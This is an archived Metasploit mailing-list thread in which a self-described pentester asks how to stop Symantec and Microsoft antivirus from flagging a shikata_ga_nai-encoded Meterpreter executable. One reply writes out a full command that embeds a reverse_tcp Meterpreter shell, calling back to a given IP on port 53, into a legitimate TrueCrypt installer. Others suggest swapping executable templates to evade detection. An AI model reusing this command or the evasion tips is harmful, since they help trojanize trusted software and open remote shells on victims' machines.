Metasploit mailing list archives
Re: Shikata_ga_nai evasion...
From: netevil <netevil () hackers it>
Date: Sun, 14 Mar 2010 19:33:56 +0100
here it is Terrence! sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.253.128.220 LPORT=53 R | sudo ./msfencode -t exe -x /home/john/pentest/TrueCrypt.exe -o /home/john/pentest/TrueCrypt_backdoored.exe -e x86/shikata_ga_nai -c 5
Send the command you are using to generate the payloads.
On Sun, Mar 14, 2010 at 14:24, ricky-lee birtles <mr.r.birtles () gmail com> wrote:Try using some of the tools from http://technet.microsoft.com/en-us/sysinternals/default.aspx as templates. As well as trying to use a different payload and see if that brings any different results/. Regards, -- Mr R Birtles On 14 March 2010 18:04, netevil <netevil () hackers it> wrote:Confirmed!..also changing template (TrueCrypt.exe, Mame.exe...) results don't change... DaviddHave you tried using a different .exe template. As the default one is what most AV vendors are using to pick up the metasploit's outputted exe'sYes Ricky! I've tried with an original putty... and this template is a flash movie i'm going to do a the third test with another template.. and see if results changes...hoping at least for symantec.. thanks DavidRegards, -- Mr R Birtles On 14 March 2010 17:40, NetEvil <netevil () hackers it> wrote:Hi guys I'm doing a pentest using my meterpreter exe encoded with shikata ga nai.. and i see it signed as suspicious by symantec and microsoft... Do you have a quick solution for these AVs evasion? I've tried some packers but same results... If not ...i know the hex editor is waiting for me... Thanks...have a nice sunday! David Sent from my mobile device -------------------------------------- _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Shikata_ga_nai evasion... NetEvil (Mar 14)
- Re: Shikata_ga_nai evasion... ricky-lee birtles (Mar 14)
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Re: Shikata_ga_nai evasion... ricky-lee birtles (Mar 14)
- Re: Shikata_ga_nai evasion... Terrence (Mar 14)
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Message not available
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Re: Shikata_ga_nai evasion... Terrence (Mar 14)
- Message not available
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Re: Shikata_ga_nai evasion... 5.K1dd (Mar 14)
- Re: Shikata_ga_nai evasion... Menerick, John (Mar 16)
- Re: Shikata_ga_nai evasion... netevil (Mar 14)
- Re: Shikata_ga_nai evasion... ricky-lee birtles (Mar 14)
- <Possible follow-ups>
- Re: Shikata_ga_nai evasion... NetEvil (Mar 17)
- Re: Shikata_ga_nai evasion... John Biondolillo (Mar 18)
- Re: Shikata_ga_nai evasion... NetEvil (Mar 18)